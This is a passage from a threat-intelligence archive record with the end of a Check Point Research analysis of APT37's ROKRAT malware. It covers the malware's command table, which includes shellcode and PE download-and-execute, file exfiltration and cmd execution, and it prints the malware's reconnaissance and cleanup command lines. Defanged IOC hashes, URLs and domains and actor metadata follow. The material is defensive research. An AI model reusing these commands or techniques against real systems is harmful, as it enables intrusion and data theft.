The result is two AES keys, one used to encrypt and decrypt commands, and one used to encrypt and decrypt payloads.\r\nROKRAT Commands\r\nEach command is identified by a single character. Some of the commands take arguments, which are supplied just after the command ID character. After the command is identified, the code parses the arguments according to the type of command. The following table lists the commands we discovered in ROKRAT, together with their expected arguments and actions:\r\nCommand ID | Command meaning | Arguments | Description\r\n0 | Stop collecting data | – | –\r\n1, 2 | Execute shellcode | URL | Downloads shellcode from the URL and runs it with CreateThread. It writes Success or Failed to a file named out.txt. It also adds information about the victim’s computer and sends it back to the C\u0026C server.\r\n3, 4 | Execute shellcode with a new token | New cloud API token | Initializes cloud provider information and then downloads shellcode from the C\u0026C server. ROKRAT expects the shellcode to exist under the generated file name it gave the C\u0026C server at the initial data collection. It then executes the shellcode with CreateThread and writes Success or Failed to a file named out.txt. It also adds information about the victim’s computer and sends it back to the C\u0026C server.\r\n5, 6 | Execute PE file | URL | Downloads a PE file from the URL, writes it to KB400928_doc.exe, and then executes it.\r\n7, 8, 9 | Execute PE file with a new token | New cloud API token | Initializes cloud provider information and then downloads a PE file from the C\u0026C server. ROKRAT expects the file to exist under the generated file name it gave the C\u0026C server at the initial data collection. It writes the file to KB400928_doc.exe, and then executes it.\r\nc | Exfiltrate files | File/directory to search; extensions of files to gather: All, Normal (doc, xls, ppt, txt, m4a, amr, pdf, hwp) or specific extensions | Looks for files specified by the arguments and uploads them to the C\u0026C server.\r\nd | Cleanup | – | Cleanup of the whole flow, which differs from sample to sample.\r\ne | Run a command | command | Executes a command with cmd.exe.\r\nf | Cleanup | – | Similar to the d command, but deletes fewer things. It can vary from sample to sample.\r\nh | Enumerate files on drives | – | Collects drive information with the command dir /A /S : \u003e\u003e \"%temp%/_.TMP\"\r\ni | Send victim data to C\u0026C | – | Gathers the victim’s information and sends it to the C\u0026C server.\r\nj/b | Kill session | – | Kills the RAT.\r\nUpon receiving the cleanup command (d), ROKRAT runs the following commands to delete persistence mechanisms not initially used by the malware. 
They might be related to some post-infection activity.\r\nreg delete HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeBootPower /f \u0026\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeBootPower /f \u0026\r\ndel c:\\programdata\\30\r\ndel \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*.VBS\" \"%appdata%\\*.CMD\" \"%appdata%\\*.BAT\" \"%appdata%\\01\" \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*.lnk\" \"%allusersprofile%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*.lnk\" /F /Q\r\nUpon receiving commands 1 – 4, ROKRAT creates a file called out.txt, which contains the following information about the system:\r\ntasklist\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AppDataStartup\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AllUsersProfileStartup\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%allusersprofile%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================SystemInfo\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nsysteminfo\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================RoutePrint\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nroute print\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================IpConfig\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nipconfig /all\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================ARP\u003e\u003e\"%temp%\\out.txt\" \u0026\r\narp -a\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================Recent\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%appdata%\\Microsoft\\Windows\\Recent\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================WMIC\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nwmic startup \u003e\u003e \"%temp%\\out.txt\" \u0026\r\necho ======================LocalAppData\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%localappdata%\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AllUsersProfile\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%allusersprofile%\"\u003e\u003e\"%temp%\\out.txt\"\r\nConclusion\r\nIn this report, we describe new activity by the notorious North Korean threat actor APT37. We discuss several different infection chains, most of which result in a ROKRAT payload. 
These infection chains show that since 2022, this group has stopped relying heavily on malicious documents to deliver malware and has instead begun to hide payloads inside oversized LNK files. This method can trigger an equally effective infection chain with a simple double click, one that is more reliable than n-day exploits or Office macros, which require additional clicks to launch.\r\nAlthough we found that ROKRAT has not changed a lot recently, we see that the loaders used to deploy it have indeed changed, shifting to the LNK method. In fact, this is the first time we have seen ROKRAT delivered with an LNK infection chain, similar to the one used to deploy GOLDBACKDOOR. It is important to note that this does not mean APT37 no longer uses malicious documents, as we found evidence of such use as recently as April 2023.\r\nWe also analyzed several newer samples of ROKRAT and described the commands that it accepts, which helps shed some light on the malware’s internal mechanisms and capabilities. Check Point Research continues to track this tool, which is imperative as APT37 is still using it while continuing to alter the infection chains.\r\nThis report, together with other recent reports on ROKRAT versions for Android and macOS, shows that APT37 continues to pose a considerable threat, launching multiple campaigns across platforms and significantly improving its malware delivery methods.\r\nCheck Point customers remain protected:\r\nThreat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems, powered by ThreatCloud AI, the brain behind all of Check Point’s security. 
Every file received via email or downloaded by a user through a web browser is sent to the Threat Emulation sandbox to inspect for malware.\r\nHarmony Endpoint provides comprehensive endpoint protection at the highest security level, including full attack containment and remediation to quickly restore any infected systems, and high catch rates with low false positives, ensuring security efficacy and effective prevention.\r\nTE Protections:\r\nTrojan.Wins.SusLNK.A\r\nTrojan.Wins.SusLNK.B\r\nInjector.Win.RemoteThread.A\r\nTechnique.Win.MalOfficeVBA.la.D\r\nExploit.Win.MalChildren.la.A\r\nHEP Protections:\r\nTechnique.Win.EmbedExeLnk.A\r\nTechnique.Win.EmbedExeLnk.B\r\nIOCs\r\nFile Hashes\r\nFile Name | SHA-256\r\n(0722)상임위원회 및 상설 특별위원회 위원 명단(최종).zip | 1c5b9409243bfb81a5924881cc05f63a301a3a7ce214830c7a83aeb2485cc5c3\r\n(0722)상임위원회 및 상설 특별위원회 위원 명단(최종).lnk | cb4c7037c7620e4ce3f8f43161b0ec67018c09e71ae4cea3018104153fbed286\r\n202207221.bat | 240e7bd805bd7f2d17217dd4cebc03ac37ee60b7fb1264655cfd087749db647a\r\n사례비_지급의뢰서.doc | 12ecabf01508c40cfea1ebc3958214751acfb1cd79a5bf2a4b42ebf172d7381b\r\nprojects in Libya.zip | 00d88009fa50bfab849593291cce20f8b2f2e2cf2428d9728e06c69fced55ed5\r\nPipelines Profile (Elfeel-Sharara-Mellitah + Wafa – Mellitah).lnk | 6753933cd54e4eba497c48d63c7418a8946b4b6c44170105d489d29f1fe11494\r\n230130.bat | 732fca9be66ba2c40c5d05845540207b9e1480e609d767aff63895bf49d33a81\r\nsecurityMail (1).zip | eb03f8b8e41b3ad27ccdecb092111e2c3c010436ad59add42755e2af04762b67\r\nsecurityMail_1031.html.lnk | 050c65d45e5f21018aa940f0188c4aa1318ac3df865d901f8643ed7ce4a4b52c\r\nsecurityMail_1101.html.lnk | 5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c\r\n27868.bat | c4029a2f1d0c07ae2b388b5a4076fba41e57af0dd0d2d0f86844464f22d63861\r\n11702.zip, 17399.zip | 9a4c61cdf0e291dc364c568aa161f744f59065efeafc72a3f892e12cbf88fc5b\r\nmfc100.dll | 0e926d8b6fbf6f14a2a19d4d4af843253f9f5f6de337956a12dde279f3321d78\r\n– (ISO file) | 6234ef67435dfcb65bd661b5f3bb0b77b82fe6cdd2109b6dfb9dea1b65a17d5d\r\n북 외교관 선발파견 및 해외공관.lnk | 479894be4c5dec0992ad3c5b21fb1423643996d80d59dcca76386bb325dc811e\r\n북한외교정책결정과정.lnk | c5c05f9df89fc803884fed2bd20a3824eae95eeb34a1827bf5210e4ac17beadd\r\n230401.bat, 230402.bat | 70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c\r\n질문지.doc | 3252345b2640efc44cdd98667dbd25806ee2316d1e01eec488fd678e885aa960\r\n– (LNK file) | 1e0b5d6b85fca648061fdaf2830c5a90248519e81e78122467c29beeb78daa1e\r\n– (LNK file) | f92297c4efabba98befeb992a009462d1aba6f3c3a11210a7c054ff5377f0753\r\n230415.bat | 06431a5d8f6262cc3db39d911a920f793fa6c648be94daf789c11cc5514d0c3d\r\nURLs\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBaFFNUDZlZzhhUkZiN0xVMUNPQ2YzeE5vVFU_ZT1wZ\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhkSUpseW14b21abFd2WW8_ZT15SjJT\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQ\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZE\r\nhxxps[://]1erluw[.]bl[.]files[.]1drv[.]com/y4mjq91jEOFfIt8XWokhkvDA3nd2tPKC9x6YXe5KPoia1IoxaHAT0f4N[…]8IqzILVZkrM48fYGI1jkeYIRenUX4NuenWy_g/my[.]jpg\r\nhxxps[://]u9izog[.]dm[.]files[.]1drv[.]com/y4mKSGc6jShxeCkGYNOnZdeG42N9DXsT4dFh5t6umtqb8bI9VePGNlZG7GP_-K9ly6IW0xeiUqMR8o6Sk9pGqnPraGVk-PxQce9pcUKcGPoKvXYaPqoiBNLDb3KK94OjeEV0RiejfEGjZ1ccTQqeWZZ0_DnN4T5NGFZRCkc4ZvlJERfXrb5JgWm1U3gC4leSiTrTtV12N\r\nhxxps[://]qb3oaq[.]bl[.]files[.]1drv[.]com/y4mHRkXCvSNkEazYL8KsgjxXW3y4EfgcyTsS_t5Wi6fefz383ova6apylWD0q0dsmeV2UbuXHYDd_fJ8cPvgLhX1dYRSVWpxXnpKq1GiHngnCioOASAeaS33ztlC74MpGEWsDuNksijGCqmtnIelhg-FBefDcwLwqsbCH01dRolRMhazBj1ZxYizw_CyFwdRbApbmUCNOQ/dragon32[.]zip\r\nhxxps[://]link[.]b4a[.]app/download[.]html?search=cHJvamVjdHMgaW4gTGlieWEuemlw\r\nhxxps[://]docx1[.]b4a[.]app/download[.]html?id=88\u0026search=tuh3m0xez3npqzr4terfd2zhsnzasgt1zedgawjhvxflazkwyudwewzieglimli1tg5safltegw=\r\nhxxps[://]naver-file[.]com/download/list[.]php?q=e1\u002618467=41\r\nDomains\r\nlink[.]b4a[.]app\r\ndocx1[.]b4a[.]app\r\nnaver-file[.]com\r\nnate-download[.]com\r\ndaum-store[.]com\r\nnaver-storage[.]com\r\nSource: https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/"
	],
	"report_names": [
		"chain-reaction-rokrats-missing-link"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775701362,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e612877e5c674dba43770826efbaad4e12f46f3.pdf",
		"text": "https://archive.orkl.eu/7e612877e5c674dba43770826efbaad4e12f46f3.txt",
		"img": "https://archive.orkl.eu/7e612877e5c674dba43770826efbaad4e12f46f3.jpg"
	}
}